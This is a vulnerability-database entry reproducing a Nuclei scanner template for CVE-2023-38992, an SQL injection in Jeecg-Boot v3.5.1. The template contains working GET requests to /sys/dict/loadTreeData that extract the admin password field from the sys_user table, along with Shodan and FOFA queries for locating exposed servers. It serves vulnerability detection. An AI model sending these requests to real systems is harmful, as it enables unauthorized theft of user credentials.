Lucene search
K

Jeecg-Boot v3.5.1 - SQL Injection

🗓️ 26 Jun 2026 18:13:08Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 44 Views

Jeecg-Boot v3.5.1 SQL Injection via title parameter, leading to unauthorized access to sensitive data. Implement input validation and parameterized queries for remediation

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-38992
28 Jul 202315:15
attackerkb
Circl
CVE-2023-38992
28 Jul 202318:35
circl
CNNVD
Jeecg-Boot SQL注入漏洞
28 Jul 202300:00
cnnvd
CVE
CVE-2023-38992
28 Jul 202300:00
cve
Cvelist
CVE-2023-38992
28 Jul 202300:00
cvelist
Github Security Blog
SQL injection in jeecg-boot
28 Jul 202315:30
github
NVD
CVE-2023-38992
28 Jul 202315:15
nvd
OSV
GHSA-WP6C-29R3-JQW9 SQL injection in jeecg-boot
28 Jul 202315:30
osv
Prion
Sql injection
28 Jul 202315:15
prion
Positive Technologies
PT-2023-26721 · Unknown · Jeecg-Boot
28 Jul 202300:00
ptsecurity
Rows per page
id: CVE-2023-38992

info:
  name: Jeecg-Boot v3.5.1 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    SQL injection vulnerability via the title parameter at /sys/dict/loadTreeData in jeecg-boot v3.5.1.
  impact: |
    Successful exploitation could lead to unauthorized access to sensitive data.
  remediation: |
    Implement input validation and use parameterized queries to prevent SQL Injection attacks.
  reference:
    - https://github.com/jeecgboot/jeecg-boot/issues/5173
    - https://my.oschina.net/jeecg/blog/10107636
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38992
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-38992
    cwe-id: CWE-89
    epss-score: 0.72043
    epss-percentile: 0.99353
    cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.1:*:*:*:*:*:*:*
  metadata:
    max-request: 4
    verified: true
    shodan-query: http.favicon.hash:1380908726
    fofa-query: icon_hash=1380908726
  tags: cve,cve2023,jeecg,jeecg-boot,sqli,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"
      - "{{BaseURL}}/{{path}}sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField=&converIsLeafVal=1&condition=&pid=admin&pidField=username"

    payloads:
      path:
        -
        - jeecg-boot/

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "parentId\":", "key\":", "{\"title", "success\":true")'
          - 'contains(header, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 490a00463044022033de63692f00666872ca623ea2332543521106f85233fd31940f8d7a726345e3022000d1acced46ce969925287d4998880688f796bc3c0fe71ceabac900c6edc2800:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.72043
SSVC
44